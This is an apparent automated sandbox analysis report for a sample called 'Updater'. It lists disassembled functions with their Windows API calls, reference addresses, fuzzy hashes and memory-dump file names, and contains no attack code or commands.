Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Menu$Thread$ItemMessage$AttachCountCurrentInputPostProcessSendSleepStringTimeoutWindow_wcslen
String ID:
API String ID: 3648899353-0
Opcode ID: 8565491adfca5a36cc6e6077e3f08f0e0f73f0961b7016f1875355254af63cd0
Instruction ID: 53bcaa0fd81605bd3a73806eaf01316a739df2f66eaa956cefe50fba99faba02
Opcode Fuzzy Hash: 8565491adfca5a36cc6e6077e3f08f0e0f73f0961b7016f1875355254af63cd0
Instruction Fuzzy Hash: B9719035A00215AFCB14EF64C885AFEBBF5EF48710F148499E91AEB351DB74AE41CB90

Function 00B8F252 Relevance: 10.7, APIs: 7, Instructions: 177filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B8DCD6,?), ref: 00B8EC50

Part of subcall function 00B8EC33: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B8DCD6,?), ref: 00B8EC69

GetFileAttributesW.KERNEL32(?), ref: 00B8F29C
GetFileAttributesW.KERNEL32(?), ref: 00B8F2B7
lstrcmpiW.KERNEL32(?,?), ref: 00B8F2E6
MoveFileW.KERNEL32(?,?), ref: 00B8F31B
_wcslen.LIBCMT ref: 00B8F454
_wcslen.LIBCMT ref: 00B8F46C
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B8F4B9

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: File$AttributesFullNamePath_wcslen$MoveOperationlstrcmpi
String ID:
API String ID: 4252263244-0
Opcode ID: 28e6887f3f738b8827857aada72ecb9d9d663a4700b8ea402dcb7aa010b6ba14
Instruction ID: 825767c7973a8c8d12a15b9a89de933a3a3907c8cc21d06ecd43d63d30bbae12
Opcode Fuzzy Hash: 28e6887f3f738b8827857aada72ecb9d9d663a4700b8ea402dcb7aa010b6ba14
Instruction Fuzzy Hash: CA5172B14083859BC724EBA4D8819EB73ECDF85310F44096FB189D31A1EF74A648C766

Function 00B5525C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B559D1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B5529E
__fassign.LIBCMT ref: 00B55319
__fassign.LIBCMT ref: 00B55334
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B5535A
WriteFile.KERNEL32(?,FF8BC35D,00000000,00B559D1,00000000,?,?,?,?,?,?,?,?,?,00B559D1,?), ref: 00B55379
WriteFile.KERNEL32(?,?,00000001,00B559D1,00000000,?,?,?,?,?,?,?,?,?,00B559D1,?), ref: 00B553B2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 589070dbb829c95bba6fced30081441ac675158ebdf53824ec053a4eaa2d6137
Instruction ID: 58bdf3871098affa00bc231fccb42a31589e0f2068ffca3fdabfc3ca8e230dbb
Opcode Fuzzy Hash: 589070dbb829c95bba6fced30081441ac675158ebdf53824ec053a4eaa2d6137
Instruction Fuzzy Hash: C7512870D006499FCB20CFA8DC91BEEBBF4EF08302F14459AE956E7291E7B49A44CB54

Function 00BB377B Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BB379A
GetWindowLongW.USER32(00000000,000000F0), ref: 00BB37CD
GetWindowLongW.USER32(00000000,000000F0), ref: 00BB3802
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BB3834
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BB385E
GetWindowLongW.USER32(00000000,000000F0), ref: 00BB386F
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BB3889

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 206beb02ed0de9cc1daf68356cd5b1312a1bcb10ac367ccfc10cf3b4a1ff1bfb
Instruction ID: 63a53cea9f02ef0f2ce057df6cbe877dc616a6fe1d337e82fef1de5cef11a3a8
Opcode Fuzzy Hash: 206beb02ed0de9cc1daf68356cd5b1312a1bcb10ac367ccfc10cf3b4a1ff1bfb
Instruction Fuzzy Hash: A9312174A04258AFDB24CF19EC85FB537E5FB4AB10F1582A4F5058B2B2CBB1AD40CB42

Function 00B885E6 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B88629
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8864F
SysAllocString.OLEAUT32(00000000), ref: 00B88652
SysAllocString.OLEAUT32(?), ref: 00B88670
SysFreeString.OLEAUT32(?), ref: 00B88679
StringFromGUID2.OLE32(?,?,00000028), ref: 00B8869E
SysAllocString.OLEAUT32(?), ref: 00B886AC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 149d87d1976831fc331b988e63984ef3db61d1116ca2414adc151997bd23c29b
Instruction ID: ae19e0aff108981960f0814a7aeb6d209085efc5d8a1138c7b6d5d394367a70b
Opcode Fuzzy Hash: 149d87d1976831fc331b988e63984ef3db61d1116ca2414adc151997bd23c29b
Instruction Fuzzy Hash: CB219576604219AF9F10EFA8DC84CBB73ECEF093647448565FA15DB261EA74EC41CB60

Function 00B886BF Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B88704
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8872A
SysAllocString.OLEAUT32(00000000), ref: 00B8872D
SysAllocString.OLEAUT32 ref: 00B8874E
SysFreeString.OLEAUT32 ref: 00B88757
StringFromGUID2.OLE32(?,?,00000028), ref: 00B88771
SysAllocString.OLEAUT32(?), ref: 00B8877F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0e4887baa1c61db4bec40b27dcdfe08a56701ac9c2c974a9f4c1e168a2b86ca2
Instruction ID: 5dbed96118cc6b7ade3fd49c3cb1b58890c738218de3ca1acf1ba3a4a2c286d5
Opcode Fuzzy Hash: 0e4887baa1c61db4bec40b27dcdfe08a56701ac9c2c974a9f4c1e168a2b86ca2
Instruction Fuzzy Hash: BD217475604205AF9B10BFA8DC88D6A77FCEF083607548265FA05CB2A1EF74EC41C764

Function 00B91330 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B91350
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B91383
GetStdHandle.KERNEL32(0000000C), ref: 00B91395
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B913CF
CloseHandle.KERNEL32(?), ref: 00B913F3

Strings

nul, xrefs: 00B913CA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Handle$Create$CloseFilePipe
String ID: nul
API String ID: 3408351469-2873401336
Opcode ID: 197e08035c008cfe02046c8188cf3af46be6a3bc98299bfca783e9b0d245ab68
Instruction ID: 302f70e9f80c6a0d0126176c74e6f144f785c5ce9700190a11d81da5d1c0b6a7
Opcode Fuzzy Hash: 197e08035c008cfe02046c8188cf3af46be6a3bc98299bfca783e9b0d245ab68
Instruction Fuzzy Hash: 9C215C7050430ABBDF208F29D805A9A7BF8FF54760F204AA9E8A0D72D0EB709840EB14

Function 00B91405 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B91424
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B91456
GetStdHandle.KERNEL32(000000F6), ref: 00B91467
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B914A1
CloseHandle.KERNEL32(?), ref: 00B914C5

Strings

nul, xrefs: 00B9149C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Handle$Create$CloseFilePipe
String ID: nul
API String ID: 3408351469-2873401336
Opcode ID: 55b800ffd0a925b45d3d8127bad1326b43da2b674f44796b6e517fa5c7cf5694
Instruction ID: dd93e20a2eef722966de7594c29c915d5b344147c8d32fac6196c3585f15c9a3
Opcode Fuzzy Hash: 55b800ffd0a925b45d3d8127bad1326b43da2b674f44796b6e517fa5c7cf5694
Instruction Fuzzy Hash: 43214B71500307ABDF209F6D9844A99B7E8EF59720F204BA9E9A0A73D0EB709851DB51

Function 00BB4A66 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B34570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
Part of subcall function 00B34570: GetStockObject.GDI32(00000011), ref: 00B345C2
Part of subcall function 00B34570: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BB4ACB
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BB4AD8
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BB4AE3
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BB4AF2
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BB4AFE

Strings

Msctls_Progress32, xrefs: 00BB4A9C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d5e2336b7bbe0833cc166acef28e7df5b440fa7eeb45c70f332ba0cc9dc6ad22
Instruction ID: b59318a402cf3d3b92a346926cbd864b3b7a71ba5a43859b88ddd96a77f15c63
Opcode Fuzzy Hash: d5e2336b7bbe0833cc166acef28e7df5b440fa7eeb45c70f332ba0cc9dc6ad22
Instruction Fuzzy Hash: BE1193B22502197FEF114F64CC82EE77FADEF08798F014111B648A2090CBB2DC21DBA4

Function 00B5D60F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B5D5D3: _free.LIBCMT ref: 00B5D5FC

_free.LIBCMT ref: 00B5D65D

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

_free.LIBCMT ref: 00B5D668
_free.LIBCMT ref: 00B5D673
_free.LIBCMT ref: 00B5D6C7
_free.LIBCMT ref: 00B5D6D2
_free.LIBCMT ref: 00B5D6DD
_free.LIBCMT ref: 00B5D6E8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 77326012cc0cff2a756482842859fd235bb3601a1db0243deaf1dd45bc4108d3
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: BD117C31541B04EAFA30FBB0DC47FCB77DCAF05706F4009D5BBA9A6052EE64BA089660

Function 00B8E854 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B8E86E
LoadStringW.USER32(00000000), ref: 00B8E875
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B8E88B
LoadStringW.USER32(00000000), ref: 00B8E892
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B8E8D6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B8E8B3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 7f2c63a630c699e3cfd8d6a940b2d4978863b5af662e006eb36cf786ac11bbc8
Instruction ID: 20b93201ece8f6c15df5577cb52ac9cbddc4940a2a4b73936c0aa842e594ef3d
Opcode Fuzzy Hash: 7f2c63a630c699e3cfd8d6a940b2d4978863b5af662e006eb36cf786ac11bbc8
Instruction Fuzzy Hash: DD01FFF69402087FE750A7949D89EEB77ACD708701F4046E5BB4AE3051EAB89E848B71

Function 00B917B9 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00000034,00000034), ref: 00B917C9
EnterCriticalSection.KERNEL32(00000014,?), ref: 00B917DB
TerminateThread.KERNEL32(?,000001F6), ref: 00B917E9
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B917F7
CloseHandle.KERNEL32(?), ref: 00B91806
InterlockedExchange.KERNEL32(00000034,000001F6), ref: 00B91816
LeaveCriticalSection.KERNEL32(00000014), ref: 00B9181D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 5b7a2194074aba0d059a1f8734638aa6eedd455613ee238619c1fd58a35ce47c
Instruction ID: 20774626c94d194c26b5cb4c3fc21eba799572b02860a4944e1c6c6b790fb379
Opcode Fuzzy Hash: 5b7a2194074aba0d059a1f8734638aa6eedd455613ee238619c1fd58a35ce47c
Instruction Fuzzy Hash: AEF0EC32155612BBD74A1B64ED8CBD6BB79FF04752F401621F101928A0ABB8E470DB94

Function 00B345EE Relevance: 9.3, APIs: 6, Instructions: 277COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00B34614
GetWindowRect.USER32(?,?), ref: 00B34655
ScreenToClient.USER32(?,?), ref: 00B3467D
GetClientRect.USER32(?,?), ref: 00B347BD
GetWindowRect.USER32(?,?), ref: 00B347DE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: caf4dbcf5a6f43d560d1c6978ff5f67e9b25af9bbe7457437b4d1d8e8d473e20
Instruction ID: 5c3a8632b98459065eddf181149cdd44ab3110219ea3ebcc2de050bf66223853
Opcode Fuzzy Hash: caf4dbcf5a6f43d560d1c6978ff5f67e9b25af9bbe7457437b4d1d8e8d473e20
Instruction Fuzzy Hash: AAB17878A0064ADBDB14CFA8C4847EEB7F1FF58310F24855AE8AAD7250EB34AD51DB50

Function 00BA28EC Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA3C99: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00BA3CE5

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00BA299C
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BA29BD
WSAGetLastError.WSOCK32 ref: 00BA29CE
inet_ntoa.WSOCK32(?), ref: 00BA2A68
htons.WSOCK32(?), ref: 00BA2AB7
_strlen.LIBCMT ref: 00BA2B11

Part of subcall function 00B84A80: _strlen.LIBCMT ref: 00B84A8A

Part of subcall function 00B3F3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,00008000,?,00000000,00000000,00000000,?,00008000,00008000,?,00B8D9C7,00008000,?,?), ref: 00B3F402
Part of subcall function 00B3F3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,?,00008000,00008000,?,00B8D9C7,00008000,?,?), ref: 00B3F435

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 457973cce26a4b243be7ae10f9ae0e95ebbcfd2f0572df52fe33188cf97a00f3
Instruction ID: 8ea108117a2d8b91acf30941fa56ad82202d476dc9ff7efee4de4a800150048e
Opcode Fuzzy Hash: 457973cce26a4b243be7ae10f9ae0e95ebbcfd2f0572df52fe33188cf97a00f3
Instruction Fuzzy Hash: 6CA1E230508300AFC724DF28C895F6A7BE5EF85714F54899CF45A5B2A2DB31EE45CBA1

Function 00B5602C Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B48204,00B48204,?,?,?,00B5627D,00000001,00000001,71E85006), ref: 00B56086
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B5627D,00000001,00000001,71E85006,?,?,?), ref: 00B5610C
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,71E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B56206
__freea.LIBCMT ref: 00B56213

Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860

__freea.LIBCMT ref: 00B5621C
__freea.LIBCMT ref: 00B56241

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: b758b8caf97956d1fd25760e7d866248ff758d7b88bbfd6a6088d5e146438f04
Instruction ID: b7d09b8f24b60c5bd239c87fd0f04311be2f62d2836960834e532f171673edb4
Opcode Fuzzy Hash: b758b8caf97956d1fd25760e7d866248ff758d7b88bbfd6a6088d5e146438f04
Instruction Fuzzy Hash: 4A51C072A00216ABEB258F64CC81FBB77E9EB44752F5946E9FC04E7180EB35DC58C650

Function 00B80851 Relevance: 9.2, APIs: 6, Instructions: 205memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00BA5FF9), ref: 00B8085D
SysAllocString.OLEAUT32(00000001), ref: 00B80904
VariantCopy.OLEAUT32(00B80B20), ref: 00B8092D
VariantClear.OLEAUT32(00B80B20), ref: 00B80951
VariantCopy.OLEAUT32(00B80B20,00000000), ref: 00B80955
VariantClear.OLEAUT32(00BA5FE5), ref: 00B8095F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

